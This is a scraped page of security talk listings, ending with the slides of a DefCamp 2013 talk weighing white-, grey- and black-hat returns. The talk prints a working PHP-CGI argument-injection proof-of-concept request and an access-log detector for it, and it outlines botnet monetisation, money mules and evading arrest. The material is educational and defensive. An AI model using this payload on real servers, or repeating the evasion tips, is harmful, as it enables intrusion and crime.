WordPress Security Implementation Guideline - Presentation for OWASP Romania ... (Dan Vasile)
This project aims for a unified approach on WordPress security design and implementation. It is definitely more than a checklist, it's a guide for secure implementation and an invitation to consider and to analyze each individual case.
There is a long list of recommended resources for securing aspects of the WordPress implementation. The project is aimed to offer open source or free resources instead of commercial ones. Some plugins have a free version and a paid one that offers extra functionality. In such cases, the focus of the project was on the free version.
SANS @Night Talk: SQL Injection Exploited (Micah Hoffman)
This presentation was given at the SANS Rocky Mountain Conference in Denver, CO, June 2014. The presentation had a rather large portion that was demo. That is not captured here. Sorry.
Talk on securing a WordPress site at WordCamp Nepal 2012. I will be covering Top 10 Myths That We Live By and Building Secure WordPress Sites in Simple 10 Steps. Watch the video at http://wordpress.tv/2013/02/26/sakin-shrestha-building-secure-wordpress-sites/
WordPress security & performance: a beginner's guide (Mickey Mellen)
We will cover how to create a secure WordPress environment, including an overview of security plugins, and backup solutions. We’ll provide numerous tips to help you keep your WordPress environments secure.
We’ll also cover some introductory WordPress performance settings. This will not be a very technical or detailed overview, but will include tips and techniques that most WordPress users can follow to improve their site’s performance.
Presentation about how everyone, no matter what their role in securing an organization is, can make a difference. Sometimes it is about taking a little vulnerability like the IIS Tilde Directory Enumeration vulnerability and making a better exploitation tool. Or perhaps contributing in other ways.
WordPress Security Presentation by Jason Conroy (from Finding Simple - http://findingsimple.com) for the March 2013 WordPress Canberra Meetup (http://wpcanberra.com.au)
You always think it will never happen to you, but when it does, it's all hands on deck. My personal site was almost hacked and since then I have actively looked at what I could improve. During this talk I will talk about what I had before and show all the improvements I made since then. It will be a mix of using the existing tools and my own creations for managing my sites.
Have you ever dreamed of getting paid to hack?!
As a Bug Hunter, this is what it's all about: you hack and find vulnerabilities in software and websites, then end up with profit and fame.
In this session, I will explain to you how to start your journey in bug hunting. Are you ready?
It's all about WordPress security: how you can protect your WordPress setup.
Content:
Security Statistics
Security tips
Recommended plugins and services
Presented on April 14, 2018 at CarolinaCon (https://www.carolinacon.org). This talk will provide a quick overview of honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.
Public facing web sites are constantly under attack and keeping websites protected is an arms race, yet security rarely gets a look-in at specification and budget allocation stages of delivering a web site - or at best is an afterthought. Yet everyone has an expectation of security and QOS that implies it is central to every project.
Security considerations should pervade all stages of a project from initial specification, throughout development and testing and on to ongoing hosting and maintenance.
In this session I will cover:
* Common threats to web security with real world case studies of compromised sites,
* Simple approaches to mitigating common threats/vulnerabilities,
* Defence in depth – an overview of the various components of web security,
* Drupal specific measures that standard penetration testing often does not account for.
* An overview of how to benefit from:
* Security monitoring and log analysis
* Intrusion Detection Systems & Firewalls
* Security headers and Content Security Policies (CSP).
Comments: https://joind.in/talk/8bbea
Presented on May 9, 2018 at SOURCE Conference Boston
(https://sourceconference.com/events/bos18/).
This version contains minor updates from previous presentations.
This talk will provide a quick overview of honeypots, an explanation of the cyber deception space, and the benefits of implementing deception as part of your cyber defense program. In addition, this talk will highlight the HoneyDB project, which enables anyone to get started with operating deception sensors and start collecting threat information. Finally, this presentation will describe how I built scalable honeypot sensor collection, employing a "Frankenstein Cloud Architecture", for minimal cost.
Bug Bounty Hunting for Companies & Researchers: Bounty Hunting in Sudan and Abroad (Mazin Ahmed)
http://blog.mazinahmed.net/2016/10/bug-bounty-hunting-swiss-cyber-storm.html
Co Speaker: Cheryl Biswas
Talk Description:
How about this: a blue team talk given by red teamers. But here’s our rationale - your best defence right now is a strategic offence. The rules of the game have changed and we need to get defence up to speed.
We’ll show you what the key elements are in a good defence strategy; what you can and need to be using to full advantage. We’ll talk about the new “buzzwords” and how they apply: visibility; patterns; big data. There’s a whole lotta data to wrangle, and you aren’t seeing the whole picture if you aren’t doing things right. Threat intel is about getting the big picture as it applies to you. You’ll learn the importance of context and prioritization so that you can manipulate intel feeds to do your bidding. And then we’ll take things further and talk about hunting the adversary, using an update on proven methodologies.
We’ll show you how to understand your data, correlate threats and pin point attacks. Attendees will leave with a new understanding of the resources they have on hand, and how to leverage those into an Adaptive Proactive Defense Strategy.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova... (Ramesh Iyer)
In today's fast-changing business world, companies that fail to adapt and embrace new ideas often struggle to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and a willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
DevOps and Testing slides at DASA Connect (Kari Kakkonen)
My and Rik Marselis's slides at the 30.5.2024 DASA Connect conference. We discuss what testing is, then what agile testing is and finally what Testing in DevOps is. Finally we had a lovely workshop with the participants, trying to find different ways to think about quality and testing in different parts of the DevOps infinity loop.
State of ICS and IoT Cyber Threat Landscape Report 2024 preview (Prayukth K V)
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
UiPath Test Automation using UiPath Test Suite series, part 4 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques.
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Connector Corner: Automate dynamic content and events by pushing a button (DianaGray10)
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
GraphRAG is All You Need? LLM & Knowledge Graph (Guy Korland)
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Transcript: Selling digital books in 2024: Insights from industry leaders - T... (BookNet Canada)
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
Search and Society: Reimagining Information Access for Radical Futures (Bhaskar Mitra)
The field of information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build, inspired by diverse, explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies need to be explicitly articulated, and we need to develop theories of change in the context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti... (Jeffrey Haguewood)
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
JMeter webinar - integration with InfluxDB and Grafana (RTTS)
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring of JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
Epistemic Interaction - tuning interfaces to provide information for AI support (Alan Dix)
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf (91mobiles)
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Dan Catalin Vasile - Defcamp2013 - Does it pay to be a blackhat hacker
1. DOES IT PAY TO BE A BLACKHAT HACKER?
DefCamp Romania – November 29, 2013
Speaker: Dan Catalin VASILE
2. About me
• Information Security Consultant
• OWASP Romania Board Member
• InfoSec Researcher / Writer / Presenter
dan@pentest.ro
http://www.pentest.ro
3. Agenda
• What is a hacker?
• Different types of hats
• A real world vulnerability
• Exploitation
  – White
  – Grey
  – Black
• Gains and risks
• Conclusion
4. What is a hacker?
Original definition (MIT 1960s & RFC 1392)
A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular.
Mainstream media definition & general public acceptance (also in RFC 1392)
Mass media and the general public's usage of the word hacker refers to security breakers motivated mainly by financial gains.
Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge.
5. Different kinds of hats
White hat
An ethical computer hacker, or a computer security expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization's information systems.
Grey hat
A skilled hacker whose activities fall somewhere between white and black hat hackers in a variety of practices. Sometimes he acts illegally, though in good will, to identify vulnerabilities in computing processes.
Black hat
A hacker who violates computer security for little reason beyond maliciousness or for personal gain.
6. A real world vulnerability
Apache Web Server :: remote code execution
Where?
In the default installation of the php5-cgi package.
The problem
PHP-CGI-based setups contain a vulnerability in how query string parameters of requests for PHP files are handed to the php-cgi binary.
Description
When php-cgi receives the processed query string as command-line arguments, command-line switches such as -s, -d or -c can be passed to the php-cgi binary. This can be exploited to disclose source code and obtain arbitrary code execution.
7. A real world vulnerability
Apache Web Server :: remote code execution
The vulnerability
In the PHP source file sapi/cgi/cgi_main.c we can see that the security check is only performed when the php.ini setting cgi.force_redirect is set and the php.ini setting cgi.redirect_status_env is set to NULL:
STD_PHP_INI_ENTRY("cgi.force_redirect", "1", PHP_INI_SYSTEM, OnUpdateBool, force_redirect, php_cgi_globals_struct, php_cgi_globals)
STD_PHP_INI_ENTRY("cgi.redirect_status_env", NULL, PHP_INI_SYSTEM, OnUpdateString, redirect_status_env, php_cgi_globals_struct, php_cgi_globals)
Using the -d switch it is possible to set cgi.force_redirect to zero and cgi.redirect_status_env to zero, so that php-cgi runs without that check and the payload in the POST data field is executed as arbitrary PHP.
8. A real world vulnerability
Apache Web Server :: remote code execution
Impact!!!
A remote unauthenticated attacker could obtain sensitive information, cause a denial of service condition or may be able to execute arbitrary code with the privileges of the web server.
9. A real world vulnerability
Apache Web Server :: remote code execution
Exploitation PoC
The C format string used by the PoC (the "%%" sequences are printf escapes, so "%%2D" is sent as "%2D" on the wire; the CRLF escapes lost in the slide export are restored here):
char poststr[] = "POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F"
"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64"
"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73"
"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E"
"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63"
"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62"
"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74"
"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68"
"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F"
"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63"
"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73"
"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\r\n"
"Host: %s\r\n"
"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26"
"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n"
"Connection: close\r\n\r\n%s";
Decoded, the query string hands php-cgi the following switches:
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
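The same query-string-to-argv behaviour the PoC relies on is what a defender can look for in web server access logs. The Python detector below is an added example, not code from the talk or from PHP: it applies the CGI rule that a query string containing no unencoded "=" is split on "+" and delivered to the script as command-line arguments, URL-decodes each piece, and flags requests that would hand php-cgi switches such as -d or -s. The log lines are constructed samples; one of them carries the encoded form of "-d cgi.force_redirect=0" from the decoded PoC above.

```python
import re
from urllib.parse import unquote

# php-cgi switches named on the slides (-s, -d, -c) plus -n, which closes
# the decoded PoC argument list.
PHP_CGI_SWITCHES = {"-s", "-d", "-c", "-n"}

# Constructed sample access-log lines in Common Log Format (not from the talk).
# Line 2 requests the source-disclosure switch -s; line 3 carries the URL-encoded
# "-d cgi.force_redirect=0"; lines 1 and 4 are benign because their query string
# contains a literal "=", so CGI delivers it as data rather than as argv.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Nov/2013:10:01:02 +0200] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.5 - - [29/Nov/2013:10:01:03 +0200] "GET /index.php?-s HTTP/1.1" 200 2048
203.0.113.9 - - [29/Nov/2013:10:01:04 +0200] "POST /index.php?%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30 HTTP/1.1" 200 99
198.51.100.7 - - [29/Nov/2013:10:01:05 +0200] "GET /search.php?q=-d+hello HTTP/1.1" 200 300
"""

# Extracts the request method and target from the quoted request line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def argv_from_query(query: str):
    """Mimic the CGI rule that turns QUERY_STRING into script arguments.

    RFC 3875 (and Apache's CGI handling) only pass the query string as
    command-line arguments when it contains no unencoded '='. In that case
    it is split on '+' and each piece is URL-decoded. Returns None when the
    query would reach the script as ordinary data instead of argv.
    """
    if query == "" or "=" in query:
        return None
    return [unquote(part) for part in query.split("+") if part]


def switches_in_query(query: str):
    """Return the php-cgi switches a request's query string would inject."""
    argv = argv_from_query(query)
    if argv is None:
        return []
    return [arg for arg in argv if arg in PHP_CGI_SWITCHES]


def scan_log(text: str):
    """Return (line_no, target, decoded_argv, switches) for suspicious requests."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        target = match.group("target")
        _, _, query = target.partition("?")
        switches = switches_in_query(query)
        if switches:
            hits.append((line_no, target, argv_from_query(query), switches))
    return hits


if __name__ == "__main__":
    for line_no, target, argv, switches in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {target} -> argv={argv} switches={switches}")
```

The decoded argv in each hit shows the analyst exactly which php.ini directives the request tried to override, which is the quickest way to triage a hit against the -d list from the PoC.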
10. A real world vulnerability
Apache Web Server :: remote code execution
Show me the numbers
12. What are the options?
Responsible disclosure
- Let Apache know about the problem
- Let them fix it
- Allow "some" time for the patch to be installed on most (??) of the systems
- Make the public announcement and get the credit
- For some cash you can make Google pay for it
A list of bug bounties programs:
https://bugcrowd.com/list-of-bug-bounty-programs/
13. What are the options?
Sell the vulnerability to a broker
- TippingPoint's Zero-Day Initiative
- iDefense's Vulnerability Contributor Program
- Vupen’s Threat Protection Program
14. What are the options?
Exploit it on your own!
- Small scale
  - A few selected targets
- Very large scale
  - Internet size attack
  - Create a botnet of servers
15. White Hat Alice
Employer: big consulting corporation
Annual net income: ~$80.000
Approach:
- Responsible disclosure
Gains:
- Fame
- ~$3k / reporting the vulnerability
https://www.google.com/about/appsecurity/patch-rewards/
Risks:
- Mainly risk free
16. Grey Hat Bob
Employer: small web-hosting provider
Annual net income: ~$45.000
Approach:
- Exploit it on a small scale
- Sell it to a broker
- Disclose it anonymously
Gains:
- No fame, just some fortune
- $50k from the broker
- ~$15k / year
Risks:
- Legal charges for hacking
17. Black Hat Mallory
Employer: self-employed/freelancer
Annual net income: ~$20.000
Approach:
- Exploit it on a 'never-seen' scale
Phase 1
19. Black Hat Mallory
Uses for the botnet
• Distributed Denial-of-Service Attacks
• Spamming
• Sniffing Traffic
• Spreading new malware
• Advertisement services abuse
• Manipulating pools/games/etc
• Mass identity theft
• Many others
20. Black Hat Mallory
DDOS
Market price:
$200/10k bots/day
Mallory’s price?
~200k/day/client
Multiple clients
He can literally make millions every day.
22. Black Hat Mallory
Risks?
Besides being the most wanted cyber-criminal ever?
Going to jail!
Side thoughts
- He only uses Bitcoins or alternative untraceable payment options
- He uses money mules to cash out
- The botnet gets divided
- He moves to a country with no extradition treaty
23. Aftermath
It takes months (years?) for the Internet to recover after such a breach.
Patching, releasing, clean install, removing all the infections is a painfully long process since the botnet tries to reactivate.
What was real and what was not?
- Apache PHP Vulnerability – REAL
- PoC – REAL
- the impact – not so real
- Black-hat exploitation – science-fiction, yet doable
Hi everybody. My name is Dan Vasile and today we're going to talk about money! More specifically, the economics behind the hacking scenes. We don't have much time to go over all the aspects, but we should set the ground for a proper understanding of the subject. The whole idea behind this talk is to see if we need to make a change in our careers and change the hats. I am very keen to find out if being on the dark side really pays off and what it takes to be black.
First things first, a little bit about myself. I have to set the proper background here, since I've asked the all-important question: Does it pay to be black? I am, and have been for some time now, a consultant in the InfoSec world. I'm also a board member of OWASP Romania, which is becoming a great place for exchanging information security ideas, and not only those related to web applications, but rather all sorts of applications. I invite you to join the group and the regular meetings; just search for OWASP Romania and you'll find us. You'll also find me with my colleagues at lunch time outside the conference room, presenting OWASP projects. Come there for a chat with us. I've been involved in information security research, I publish on my blog and I present at conferences. Just like I do now.